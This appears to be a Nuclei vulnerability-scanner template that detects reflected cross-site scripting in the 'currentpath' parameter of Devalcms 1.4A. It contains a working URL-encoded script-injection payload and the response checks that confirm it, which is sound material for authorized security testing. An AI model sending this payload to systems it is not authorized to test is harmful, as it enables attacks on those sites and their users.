id: devalcms-xss info: name: Devalcms 1.4A - Cross-Site Scripting author: arafatansari severity: medium description: | Devalcms 1.4A is affected by Cross-Site Scripting (rXSS) in the 'currentpath' parameter of the index.php file. reference: - https://www.exploit-db.com/exploits/6369 metadata: verified: true tags: devalcms,xss,cms,edb requests: - method: GET path: - '{{BaseURL}}/index.php?currentpath=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word part: body words: - 'sub menu for: ' - type: word part: header words: - text/html - type: status status: - 500